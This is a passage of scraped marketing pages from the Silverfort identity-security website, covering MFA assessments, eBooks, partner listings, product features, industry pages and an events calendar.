https://www.silverfort.com/cyber-identity-risk-assessment-gps-sf/ Identify MFA and privileged access protection gaps with GuidePoint Security and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-07-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-tv-sf/ Identify MFA and privileged access protection gaps with Tevora and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-07-18 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-em-aud-jul-24/ Take Control Of Your Cyber Insurance Coverage Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-07-18 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-li-aud-jul-24/ Take Control Of Your Cyber Insurance Coverage Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-07-17 - Modified: 2025-04-16 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/the-riskpoint-group/ Silverfort's Cyber Insurance Ecosystem The Riskpoint Group The RiskPoint Group is one of Europe’s largest Managing General Underwriters (MGUs) and a Coverholder with Lloyd’s of London, providing best in class insurance solutions to businesses and their advisors globally. With 250+ employees and 16 locations in Europe, North America, and Asia Pacific, the RiskPoint Group employs expert underwriting and specialized, in-house claims teams. How Silverfort and The Riskpoint Group work together The RiskPoint Group launched CyberMultiplied in 2024, which aims to provide a package of services that will make cyber insurance and improved cyber security accessible for all businesses and organizations. We believe that Silverfort offers our insureds a powerful solution to protect their critical administrative accounts, including some of the most vulnerable accounts that are associated with legacy Windows applications. Contact us to get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2024-07-12 - Modified: 2024-09-12 - URL: https://www.silverfort.com/webinar-on-demand-top-criteria-itdr-solutions/ Webinar on Demand: Top 5 Evaluation Criteria for ITDR Solutions https://www. youtube. com/watch? v=9zS0mCsjzQA --- - Published: 2024-07-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-free-assessment-nc-sf/ Identify MFA and privileged access protection gaps with Novacoast and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-06-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-compliance/ See Silverfort in action – fill out the form to instantly schedule a demo. Compliance with regulations and standards is critical to every organization. Silverfort assists you in meeting the identity protection requirements, with its MFA, PAM, and service account protection. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2024-06-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-pam/ See Silverfort in action – fill out the form to instantly schedule a demo. Silverfort’s platform provides an unmatched 360 insight into all your privileged accounts within days, automating what has been until now a manual and complex operation that often took years to complete. Leverage Silverfort to discover all privileged users and service accounts, including undocumented ones, and map their dependencies to simplify their onboarding into your PAM, without the risk of breaking the various systems that rely on them. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. window. addEventListener("message", (ev) => { if (ev. data. type === 'hsFormCallback' && ev. data. eventName === 'onFormReady') { window. hero = new RevenueHero({ routerId: '1452' }) hero. schedule('hsForm_58b8d0d8-810b-4f9e-93bf-a887491991c2') } }); --- - Published: 2024-06-12 - Modified: 2024-11-04 - URL: https://www.silverfort.com/zero-trust-ebook-thn-aud/ Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified. However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice. In this eBook, we outline a framework that will help bring your Zero Trust strategy to fruition. Gain insights into topics, including: Why the identity control plane is the natural place to begin your Zero Trust journey. The 4 pillars of implementing Identity Zero Trust in your environment. Requirements for taking a “never trust, always verify” approach to every authentication. --- - Published: 2024-06-12 - Modified: 2024-11-04 - URL: https://www.silverfort.com/zero-trust-ebook-thn-li-aud/ Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified. However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice. In this eBook, we outline a framework that will help bring your Zero Trust strategy to fruition. Gain insights into topics, including: Why the identity control plane is the natural place to begin your Zero Trust journey. The 4 pillars of implementing Identity Zero Trust in your environment. Requirements for taking a “never trust, always verify” approach to every authentication. --- - Published: 2024-06-07 - Modified: 2025-02-23 - URL: https://www.silverfort.com/identity-security-alliance-partner-directory/ Identity security alliance Find a partner Our Identity Security Alliance is helping businesses take their identity security where it has never gone before. Find a partner in the directory below. Apono Just-In-Time Access. Automatic granular permissions needed to keep your business running and secure. Visit Apono Axonius The Axonius Platform is the system of record for all digital infrastructure to let IT and security teams understand all assets, their relationships, and business-level context. Visit Axonius Check Point Check Point Software Technologies is a global leader in cyber security solutions, dedicated to protecting corporate enterprises and governments worldwide. Visit Check Point CyberArk The CyberArk identity security platform is the first line of defense against malicious actors and unauthorized access to protect what matters most. Visit CyberArk DUO Connect and protect your employees, business partners and customers with identity-powered security. Visit Duo Entro A pioneer in non-human identity management, Entro enables organizations to securely utilize non-human identities and secrets, overseeing their usage and automating their lifecycle from inception to rotation. Visit Entro Exabeam The world’s most advanced cloud-native security operations platform, powered by AI, delivering superior threat detection, investigation, and response (TDIR). Visit Exabeam HYPR HYPR’s identity security solution empowers you to continuously detect, prevent, and eliminate identity-related risks for your workforce and customers. Visit HYPR Infinipoint Infinipoint is the Zero Trust Workforce Access Platform, authenticating, securing and verifying both user and device, at the point of access, and continuously throughout every session. Visit Infinipoint Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection to any asset, and simplify cloud migration. Learn more about Silverfort & Microsoft Okta The leader in secure access and identity management and authentication. Visit Okta Palo Alto Networks Palo Alto Networks, the global cybersecurity leader, continually delivers innovation to enable secure digital transformation—even as the pace of change is accelerating. Visit Palo Alto Networks Ping Identity Ping Identity helps you protect your users and every digital interaction they have while making experiences frictionless. Visit Ping Identity RSA RSA provides identity security solutions for the world’s most security-sensitive organizations. Visit RSA Red Access Red Access helps companies secure all their browsing activities in the complexity of in-office and hybrid work. Visit Red Access ServiceNow We help organizations of every size, in every industry, put AI to work for people. Visit ServiceNow Sgnl Context changes everything: Limit the blast radius of a breach with modern privileged identity management and protect your critical systems. Visit Sgnl StrongDM StrongDM is a Dynamic Access Management platform that goes beyond the capabilities of traditional PAM solutions to support all modern infrastructure. Visit StrongDM Torq Torq delivers the security industry’s first enterprise-grade hyperautomation platform capable of automating the most complex security infrastructures at dramatic scale. Visit Torq Valence Find and fix your SaaS risks with the only SaaS security platform that brings together security teams and business users to effectively manage SaaS security posture and remediate risks. Visit Valence Security Veza Veza, the Identity Security company, has cracked the code on cybersecurity’s hardest question: “Who can take what action on what data? ” Visit Veza Wiz Use the Wiz Cloud Security Platform to build faster in the cloud, enabling security, dev and devops to work together in a self-service model built for the scale and speed of your cloud development. Visit Wiz --- - Published: 2024-06-05 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/identity-security-posture-management/ Identity Security Posture Management (ISPM) Find, fix and fortify every identity weakness, everywhere You can't protect yourself from the risks you can't see. Enhance your resilience with automated discovery and rapid mitigation of the weaknesses that expose your hybrid environment to identity threats. Get a demo or Take a tour Strengthen your resilience against identity threats. Patented in-line protection allows our platform to seamlessly extend throughout your identity infrastructure, so you get comprehensive visibility into all security weaknesses stemming from misconfigurations, malpractices, legacy infrastructure, and insecure settings. Practical insights from actual user access. Informed by a holistic view of your systems and infrastructure, our platform analyzes real human and non-human user access activities to disclose insecure protocol usage and access patterns. Unified on-prem & cloud analysis. Our platform offers full visibility into the intersections between environments, where your on-prem identity security weaknesses expose your cloud to attack. Active exposure mitigation. Mitigate any weaknesses and exposures you discover with actionable guidance and our MFA and authentication firewall policies. Learn more about our platform Comprehensive visibility. Actionable insights. Discover Know your identity threat exposure Get a consolidated view of all the weaknesses that expose your environment to credential access and privilege escalation. Analyze Prioritize the risks that matter most Focus on the most critical threats and optimize your exposure management efforts with our probability and impact-based ISPM scoring. Optimize Enhance your identity threat resilience Fix weaknesses and exposures by resolving misconfigurations and legacy settings or enforcing Silverfort’s MFA and Authentication firewall policies. How Silverfort powers your identity security posture. Take a tour of ISPM Enhanced identity resilience across your entire environment. “With the help of Silverfort, we were able to fill a critical gap in our identity security which we were experiencing, which was key for our overall security posture. ” Katie McMillan, Agilisys’s Information Security Manager. The challenge Due to the different security challenges and increased awareness of identity-based attack methods, Agilisys needed to strengthen their security posture and hygiene and fit all their identity security needs. Our solution With Silverfort, Agilisys improved its organizational security hygiene by enforcing universal, adaptive MFA and gaining insights into all their users’ activity. Learn more Explore blog --- - Published: 2024-05-16 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/authentication-firewall/ Authentication Firewall Boost your environment’s resilience with the power of deny. Protect your identity infrastructure from within. Govern and control users’ access based on their identity with no infrastructure changes with Silverfort’s authentication firewall. Get a demo or Take a tour Power up your access controls with our authentication firewall. Divide your environment into logical access segments with the flexibility to dynamically change it in a single click. Protect the full scope Cover the full range of your AD managed resources with access policies across all servers, applications, and IT infrastructure. Reduce the attack surface Enhance security posture by blocking access when insecure protocols are used or users have a misconfiguration that puts them at risk of compromise. Contain active attacks Freeze all access to some or all of your environment when a breach is detected. Learn more about our platform Control access to every resource in a single click. Protect Block access based on identity Automatically deny access in real time when an authentication attempt or access request violates access policy conditions. Secure Enforce least privilege access policies Segment your environment so users can only access the resources they need to out carry out their work – and nothing beyond that. How Silverfort stops malicious access in real time. Take a tour of Authentication Firewall Embracing the power of deny to strengthen security posture and mitigate threats. “Silverfort’s authentication firewall has helped us to apply deny access policies across our organization, which has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources. ” Head of IAM of a leading retail organization The challenge The company realized it needed to strengthen its security posture across its entire organization due to the various identity security risks posed by its users when accessing corporate resources. They needed to be able to limit who was allowed to access which resources and systems. Our solution With Silverfort, the company has adopted the principle of least privilege by creating group-segmented access policies and applying deny access policies on user groups when needed. Now the company can enforce more strict access controls on each user, resulting in a more powerful security posture for the entire company. Learn more Explore blog --- - Published: 2024-05-09 - Modified: 2024-11-04 - URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-li/ In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why service accounts are so difficult to protect. Which approaches currently exist to mitigate this risk and their limitations. How to automatically discover, monitor and protect every service account in your environment. --- - Published: 2024-05-03 - Modified: 2025-08-18 - URL: https://www.silverfort.com/events/ Meet the team wherever you are. Browse by region or join us for an online event. US & Canada EMEA APAC Online In person: EMEA Gartner Security & Risk Management Summit 22 – 24 September 2025 London, UK Test Flight World Tour 2025 Buckle up for the Silverfort Test Flight World Tour, a hands-on identity security experience like no other. Join us for live, complimentary sessions across the globe where you'll see what teams can achieve with identity security done right. Check out our upcoming Test Flights below. Learn more about Test Flight here Browse by region US & Canada EMEA APAC Online & Webinars US & Canada 20 August 2025 Silverfort is looking forward to meaningful conversations with cybersecurity leaders at the Chicago CISO Dinner this August! Chicago, IL, US 26 August 2025 Cincinnati, we’re coming for you! Silverfort can’t wait to talk identity security at the August CISO Dinner. Cincinnati, OH, US 21 August 2025 We’re heading to CXO CISOMeet in Atlanta! Catch the Silverfort team at the event — let’s talk identity security. Atlanta, US 9 September 2025 The CXO CISOMeet in Columbus is around the corner and we can’t wait to talk all things identity security! Columbus, OH, US 9 September 2025 Silverfort is excited to connect with Cybersecurity leaders at the CISO Leadership Exchange in Milwaukee, WI this September! Milwaukee, WI 10 - 11 September 2025 The future of identity security is taking shape at Identity Week, and Silverfort will be there to help lead the conversation. See you there! Washington DC, US 24 – 26 September 2025 Visit us at booth #Ex14 to discover how Silverfort and Okta work together to secure every identity. Las Vegas, NV, US 30 September 2025 Planning to be at GBI Impact? So are we! Stop by and say hello to the Silverfort crew. Boston, US 30 September 2025 Going to Hou. Sec. Con. this year? Stop by our booth and let’s chat all things cybersecurity! Houston, TX, US 5 - 7 October 2025 If you're heading to Innovate 2025, make sure to catch up with Silverfort to discover how we're securing every identity. Scottsdale, AZ, US 7 October 2025 Silverfort is looking forward to attending IANS Atlanta this year. Let’s explore the latest in cybersecurity together. Atlanta, US 8 October 2025 We're heading to the Rochester Security Summit! We can’t wait to join the conversation. New York, US 14 October 2025 Join us at IANS Boston! We're looking forward to insightful discussions with security leaders. Boston, US 23 October 2025 Silverfort will be at CXO CISOMeet – Boston to connect with fellow CISOs and executives shaping the future of cybersecurity. Let’s catch up! Boston, US 28 October 2025 Silverfort is heading to IANS New York! Meet our team to explore how identity security is evolving — and how your organization can stay ahead. New York, US 18 November 2025 Silverfort is excited to join IANS Chicago this November. Come see us and chat about all things cybersecurity for 2026! Chicago, IL, US EMEA 27 August 2025 Silverfort is proud to support our Benelux partner Jarviss at CONTXT 2025. Meet Fred and Davy onsite as we join their annual customer event. Ghent, Belgium 9 September 2025 Silverfort is heading to Connexta Security Day in Paderborn! Visit our booth to discover how end-to-end identity security can strengthen your security posture. Paderborn, Germany 10 September 2025 Silverfort will be at Bechtle Security World 2025 in Hamburg — with a booth and a speaking slot! (German speaking event) Hamburg, Germany 10 September 2025 We’re co-sponsoring Scot-Secure West with our partner Cyber Vigilance. Pete Batchelor will be attending from the Silverfort team — come say hello! Glasgow, Scotland 16 September 2025 Silverfort is exhibiting in the Cyber Zone at Fusion Live 2025, Trustmarque’s flagship event. Don’t miss our speaking session with Pete Batchelor and Kev Smith onsite. London, UK 17 September 2025 Join Silverfort at Pints & Access Insights, a casual IAM networking event hosted by our partner Thirdwave Identity. James Snowling and Scott Goodall will be there to share insights over a pint. London, UK 17 September 2025 Join Silverfort at Lyon Cyber Expo, where we’ll be hosting a station at the Metsys booth. Let’s connect on securing identities in hybrid IT environments. Lyon, France 17 September 2025 We'll be at the Public Sector Cyber Security Conference & Expo in Manchester, UK! More details to come. Manchester, UK 18 September 2025 Silverfort is sponsoring Identity Day Copenhagen 2025 in partnership with Arctic Group and ID North. Jon Martin and Al Scott will be onsite — come connect with us in the Nordics! Copenhagen, Denmark 18 September 2025 Join Silverfort at Identity Fabric Impact Day in Munich! Don’t miss our session with Rob Ainscough on securing privileged access, and stop by our booth to connect. Munich, Germany 18 September 2025 Silverfort is proud to be a Bronze Sponsor at CYSEC UAE 2025. Visit our booth to explore how unified identity security helps build a resilient digital future. Abu Dhabi, UAE 18 – 19 September 2025 Silverfort is excited to speak and exhibit at Integrity Partners Security Days 2025 in Olsztyn. Let’s talk about defending against identity-based threats at scale. Olsztyn, Poland 22 – 24 September 2025 Watch this space for more details of how to meet Silverfort at Gartner SEC EMEA! London, UK 25 September 2025 We’re co-sponsoring the NHS IAM Summit with our partner Bluefort. Pete Batchelor will be attending from Silverfort to discuss identity security in healthcare. Milton Keynes, UK 7 – 9 October 2025 We're exhibiting at it-sa 2025 in Nürnberg — Europe’s leading IT security expo. Visit Silverfort in Halle 7, Stand 503 to see identity security in action! Nürnberg, Germany 9 October 2025 Catch Rob Ainscough on stage at Identity Day Stockholm 2025, sponsored by our partner The Arctic Group. Rob Ainscough, Jon Martin, and Al Scott will all be attending. Stockholm, Sweden 16 October 2025 More details to follow! London, UK 21 October 2025 Silverfort is a Diamond Sponsor at Identity Days Paris 2025. Don’t miss our booth and speaking session on advancing identity-first security. Paris, France 6 November 2025 Silverfort is joining Identity-Centric Cybersecurity Impact Day 2025 in Frankfurt with a booth and a speaking session. Let’s advance identity-first security together. Frankfurt, Germany 18 – 20 November 2025 Silverfort is looking forward to meaningful 1:1 conversations at mysecurityevent in Stuttgart this November. Let’s connect! Stuttgart, Germany 25 November 2025 We’re excited to be a Silver Sponsor at Abicom Forum IT 2025. Stop by the Silverfort booth to learn how we’re reshaping access control in complex IT environments. Clermont-Ferrand, France 25 November 2025 More details to follow! Amsterdam, Netherlands 26–27 November 2025 Silverfort will be present at CBC Toulouse 2025 at the Metsys booth. Let’s discuss identity security strategies for hybrid and cloud environments. Toulouse, France 24–27 November 2025 Silverfort is a Platinum Sponsor of the 2025 CCN-CERT STIC Conference in Madrid. Visit our booth to explore how we help secure access across all identities and systems. Madrid, Spain APAC 19-20 August 2025 Catch up with the Silverfort APAC team at CISO Singapore! More information to follow. Singapore 20-21 August 2025 Nantharat Puwarang and Sim Yap will be at TB Cert's Cybersecurity Annual Conference 2025. Bangkok, Thailand 8 October 2025 We're looking forward to Australia's premier security conference, Security Edge. More details to come! Melbourne, Australia 17 October 2025 Meet Hiro Aoyama, Stuart Wilson and Kimimasa Sato. Japan 21-23 October 2025 Silverfort will be at Govware 2025 – watch this space for more details. Singapore Webinars & Virtual Events Thursday 23 October 2025 | 11am ET / 8am PST Identity Under Siege: Securing Finance Institutions with Modern Access Controls Join experts from the Cyber Security and Cyber Insurance spaces as they discuss scalable strategies and real-world case studies for managing identity across hybrid environments. Online --- - Published: 2024-04-29 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-telecommunications/ Telecommunications Identity security for telecoms. Defend against ransomware attacks and take your identity security where it has never gone before—all from a single platform. Get a demo or Take a platform tour Strengthening identity security posture with universal MFA. "The deployment of Silverfort was a smooth month-long process where they enrolled over 15,000 employees with proper MFA protection. We've worked together over the years to harden our overall identity security posture and protect ourselves against the threat of malicious actors. " Leading Telecoms provider Southeast Asia The challenge A leading telecoms provider needed to apply end-to-end MFA protection to their custom legacy telecom applications. When their employees requested access to view customer data from an application, there was no process in place to verify the user. Our solution Since deploying Silverfort, the telecom has had full visibility into all user authentication requests across all custom applications, and have proactively strengthened their security posture with complete identity security across its ever-evolving environments. Secure every dimension of identity Broadcast without cyber interruption. Silverfort enables telecom providers to mitigate the risk of malicious access across their complex environments including the most legacy components in them. Secure access to legacy servers Protect user access to AD managed legacy servers with MFA for all Kerberos and NTLM authentications, including those that could never have been protected before. Service account visibility Get clear and comprehensive insight into all AD service accounts’ inventory, privilege level, security posture, sources and destinations, and activity patterns. Consistent protection across M&A environments Have equal level of visibility, access control, and identity risk management across the different environments your organization has consolidated. Every user access secured. Extend MFA to any system Use MFA to secure all users, all resources and all access methods in your AD environment, from legacy servers to file shares, data based and local workstation login. Read more Automate service account protection Discover and protect and in scale all of your service accounts by grouping them into a single policy that confines their access to their predesignated sources and destinations. Read more Monitor and govern all user activity Gain a single pane of glass to view the authentication trail of your entire user inventory including standard workforce, admins, service accounts and external contractors. Use MFA to secure all users, all resources and all access methods in your AD environment, from legacy servers to file shares, data based and local workstation login. Read more Discover and protect and in scale all of your service accounts by grouping them into a single policy that confines their access to their predesignated sources and destinations. Read more Gain a single pane of glass to view the authentication trail of your entire user inventory including standard workforce, admins, service accounts and external contractors. Take a platform tour Learn more Explore blog --- - Published: 2024-04-29 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-finance/ Finance Identity security for financial institutions. Gain resilience against identity threats across your entire hybrid environment, from legacy apps and servers to the latest SaaS applications and cloud workloads. Get a demo or Take a platform tour Powering up identity security posture and operational efficiency with complete visibility. "We now have a streamlined set of robust security measures in place to mitigate the threat of malicious actors using compromised credentials to access our systems, as well as a solution that empowers all of our users to work more efficiently. " IT infrastructure managerMajor multinational bank The challenge The bank wanted to use its own custom MFA app as the single solution for identity verification but encountered difficulties incorporating its internal homegrown apps. This is because these apps don’t natively support MFA, so extending coverage to all of them would’ve required extensive code changes to each individual app. Our solution Since deploying Silverfort, the bank has rapidly improved their security posture and the efficiency of their operations with complete visibility into all user authentication requests, allowing them to easily extend their custom MFA solution to all applications, without changes or proxies. Secure every dimension of identity All users. All resources. Silverfort enables financial institutions to gain unified visibility and access policy enforcement even in the most complex environments, across every user, admin, or NHI. Visibility to every user and resource access Gain unified view of all your user accounts and their authentication trail to any on-prem or cloud resource, aggregating the different identities of each user, as multiple types of NHI. Granular identity segmentation Segment your environment based on user identities enforcing least privileged access policies on all users, admins, and service accounts. Threat exposure management Monitor your environment for any security weaknesses that expose your users to compromise and malicious access, enabling your IAM team to prioritize and resolve them. Secure with operational confidence. Protect your admins with ease Map all your privileged users and NHI using Silverfort’s automated discovery and enforce virtual fencing policies to eliminate excessive admin access, and reenforce their secure access with JIT and MFA. Read more Stop lateral movement in real-time Place MFA and Deny Access policies on ransomware actors favorite spread tool such as command line tools and RDP to block malicious access attempts that use compromised credentials. Read more Extend MFA to legacy apps Apply MFA policies on mission critical on-prem applications that couldn’t support MFA before, without any code modification or any other system changes. Read more Map all your privileged users and NHI using Silverfort’s automated discovery and enforce virtual fencing policies to eliminate excessive admin access, and reenforce their secure access with JIT and MFA. Read more Place MFA and Deny Access policies on ransomware actors favorite spread tool such as command line tools and RDP to block malicious access attempts that use compromised credentials. Read more Apply MFA policies on mission critical on-prem applications that couldn’t support MFA before, without any code modification or any other system changes. Read more Take a platform tour Learn more Explore blog --- - Published: 2024-04-25 - Modified: 2025-04-29 - URL: https://www.silverfort.com/identity-security-alliance/ Technology partners Identity Security Alliance We’re bringing security and identity leaders together to help businesses take their identity security where it has never gone before. Find a partner or Become a partner Get to know our partners Our Identity Security Alliance brings together next-gen technology partners to develop and deliver comprehensive, end-to-end security integrations with Silverfort that can dynamically adapt to evolving identity infrastructures. Next-Level Identity Security Silverfort complements existing IAM, MFA, and PAM partner offerings to add modern identity security to all resources across the hybrid environment. Best-In-Class Solutions With Silverfort’s ISA partners, you can be confident that your purchase decisions are based on validated and integrated solutions. Quick & Efficient Enjoy faster time to deployment and reduced technical support burden and costs due to the program’s pre-validation of solutions. Identity alliances We partner with all identity providers to secure customers’ environments with seamless product integrations, enabling strong authentication workflows while ensuring comprehensive security. Security alliances We collaborate with security providers to facilitate unified threat signal sharing, enabling customers to tailor identity security consumption across their SIEMs and security dashboards. --- - Published: 2024-04-23 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-education/ Education Identity security for education. Build resilience against ransomware attacks with real-time MFA and service account protection to prevent malicious access to your sensitive data. Get a demo or Take a platform tour Westminster School—In partnership with Data#3 Protecting student data with unparalleled identity security. "When you get the best of both worlds, with a great product and great people, hands down it’s a winner. Data#3 and Silverfort have become trusted advisors on this matter. " Simon MatthewsInfrastructure lead, Westminster School The challenge Westminster School counts cyber security among the most critical responsibilities of its IT department. The school wanted to minimise risk exposure by strengthening protection around legacy applications and systems. Our solution The Data#3 and Silverfort team addressed a blind spot that was not protected well by existing identity and access management products. The solution solves the technology challenge of enforcing secure authentication on all users, resources and protocols, both in on-premises and multi-cloud environments, thwarting efforts at lateral movement by malicious actors. Secure every dimension of identity Securing the identity attack surface. Silverfort enables students and staff to access critical resources securely, mitigating the risk of malicious access with compromised credentials. Secure access to legacy servers Protect user access to AD managed legacy servers with MFA for all Kerberos and NTLM authentications, including those that could never have been protected before. Unmanaged devices risk mitigation Monitor closely access attempts to your resources, detect access anomalies that indicate a potentially compromised devices and block them in real-time. AD service accounts security Automate the discovery and protection of service accounts in your AD environments, with full visibility into each account’s activities and auto-generated access policies to prevent malicious access. Extend identity security to all users and resources. Protect the unprotectable with MFA Apply MFA policies on every AD authentication and access attempts, across command line and screen sharing remote access tools to any file share, database or server Read more Detect and block identity threats Gain real-real time protection against credential access, privilege escalation and lateral movement and other types of malicious access. Read more Scale your service account protection Group all your service accounts and protect them with a single policy that would place a virtual fence across each and block its access upon deviation from its predesignated sources and destinations. Read more Apply MFA policies on every AD authentication and access attempts, across command line and screen sharing remote access tools to any file share, database or server Read more Gain real-real time protection against credential access, privilege escalation and lateral movement and other types of malicious access. Read more Group all your service accounts and protect them with a single policy that would place a virtual fence across each and block its access upon deviation from its predesignated sources and destinations. Read more Take a platform tour Learn more Explore blog --- - Published: 2024-04-23 - Modified: 2025-05-19 - URL: https://www.silverfort.com/industry/identity-security-for-healthcare/ Healthcare Identity security for healthcare. Enforce adaptive MFA and identity segmentation policies on all your users, admins, and service accounts to mitigate ransomware risks and compromise of electronic protected health information (ePHI) sensitive data and comply with mandatory cyber regulations. Get a demo or Take a platform tour Protecting patient data with complete observability and security. “Silverfort allows Huntsville Hospital to enforce MFA on our privileged access accounts and has enabled us to secure our service accounts within our Active Directory environment. ” Rick Corn VP, Chief Information Officer The challenge As a healthcare provider, the most important thing for Huntsville Hospital is protecting its patients' data. They sought to understand their privileged access accounts and service accounts and enforce effective security controls on each and every one of them. Our solution With Silverfort, the team at Huntsville Hospital can now observe and protect all privileged access and service accounts in their environment. They can now be sure that their patients have confidence in the way they maintain and protect their information. Secure every dimension of identity Every user access secured. Silverfort enables healthcare organizations to safeguard access to electronic protected health information, mission-critical applications, and other sensitive data with continuous monitoring, analysis and enforcement of identity security controls on all your users and resources. Extend identity security to legacy resources MFA, JIT, and granular identity segmentation access policies are now within reach for every application and server in your AD environment, including those that you could never protect before. Protect admin access Automate the discovery of your admin users and service accounts and protect them with least privileged access policies with no need for vaulting or password rotation. Block ransomware spread Enforce MFA policies on command line access to proactively prevent attackers from moving laterally in your network, and contain active attacks in a single click using authentication firewall. End to end visibility and protection. Extend MFA to legacy systems Apply MFA policies to every Active Directory managed resource: legacy application, file share, and other critical resources. This is the only solution that can enforce MFA on any Kerberos, NTLM, or LDAP authentication without agents or proxies. See how with Universal MFA Secure service accounts Automate the discovery and protection of all your service accounts in your AD environment, with complete visibility and auto-generated virtual fencing policies that restrict their resource access to their predesignated tasks and prevents abuse by attackers. Learn more about Service Account Protection Protect your administrative users Discover all the users that perform admin access and secure them with least privileged access policies, confining them to resources within their access tiers, and reenforce protection with JIT and MFA. Learn about Privileged Access Security Apply MFA policies to every Active Directory managed resource: legacy application, file share, and other critical resources. This is the only solution that can enforce MFA on any Kerberos, NTLM, or LDAP authentication without agents or proxies. See how with Universal MFA Automate the discovery and protection of all your service accounts in your AD environment, with complete visibility and auto-generated virtual fencing policies that restrict their resource access to their predesignated tasks and prevents abuse by attackers. Learn more about Service Account Protection Discover all the users that perform admin access and secure them with least privileged access policies, confining them to resources within their access tiers, and reenforce protection with JIT and MFA. Learn about Privileged Access Security We dared to push identity security further—so you can protect every patient, system, and caregiver. See what’s possible when identity is your first line of defense. Set up a demo to see the Silverfort Identity Security Platform in action. Get a demo Learn more Explore blog --- - Published: 2024-04-23 - Modified: 2025-05-20 - URL: https://www.silverfort.com/industry/identity-security-for-retail/ Retail Secure every transaction. Protect every customer. Ransomware actors target retailers to move laterally, disrupt operations, and steal customer data. Silverfort stops them in real time, blocking malicious access from compromised users and service accounts before attackers can reach payment systems, POS networks, or customer records. Get a demo or Take a platform tour “With Silverfort, we enforce MFA on critical systems, protect AD service accounts, and secure privileged access—without disrupting users. It gives us confidence in who's accessing our systems and helps us stay ahead of identity-based attacks and ransomware risks. ” Head of IAM, Major Multinational Retailer Secure every dimension of identity Identity is where cyber resilience ends—and where attackers strike first. With Silverfort, retailers can defend against identity-first attacks with frictionless identity security, blocking ransomware spread paths in real time—even across the most complex, hybrid retail environments. Granular visibility into every account Gain a centralized view of all your user accounts and their access trail across POS networks, loyalty platforms, supplier portals, inventory tools and other critical resources. MFA everywhere Enforce MFA policies on all user access to AD managed resources, whether it’s carried locally or remotely with command-line access tools or RDP. Rapid incident response Expedite and optimize your incident response with the ability to freeze all access in a single click and automate the detection of compromised accounts with full disclosure of the attack’s path. Protect your retail environment with ease and efficiency. From in-store systems to e-commerce platforms, secure every identity across your retail operations—without slowing down your business. Enhance identity resilience Discover and resolve the hidden gaps that expose employee and vendor accounts to credential compromise, privilege escalation, or lateral movement—across both physical and digital storefronts. Read more Extend MFA to all users and access points Apply MFA to all critical retail systems—including file shares, legacy POS applications, databases, and IT infrastructure—even those previously out of reach. Read more Secure your service accounts Automatically discover and lock down service accounts so they can access only what they’re meant to—blocking attackers from hijacking them to move laterally across store networks and backend systems. Read more Discover and resolve the hidden gaps that expose employee and vendor accounts to credential compromise, privilege escalation, or lateral movement—across both physical and digital storefronts. Read more Apply MFA to all critical retail systems—including file shares, legacy POS applications, databases, and IT infrastructure—even those previously out of reach. Read more Automatically discover and lock down service accounts so they can access only what they’re meant to—blocking attackers from hijacking them to move laterally across store networks and backend systems. Read more Take a platform tour We dared to push identity security further—so you can protect every store, system, and shopper. See what’s possible when identity is your first line of defense. Set up a demo to see the Silverfort Identity Security Platform in action. Get a demo Learn more Explore blog --- - Published: 2024-04-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-identity-underground-report-thn-contributed-article/ When it comes to identity protection, what lies above the ground are the user accounts and configurations we’re aware of, for which we can design and implement 